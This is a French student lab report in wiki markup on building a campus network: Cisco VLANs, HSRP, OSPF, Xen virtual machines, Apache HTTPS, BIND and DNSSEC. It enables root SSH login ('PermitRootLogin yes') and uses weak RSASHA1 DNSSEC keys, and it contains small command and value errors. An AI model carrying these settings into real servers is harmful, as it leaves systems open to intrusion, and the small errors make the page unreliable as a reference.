#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues une fois que l'interconnexion avec le réseau de l'école est configurée (plus bas).&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
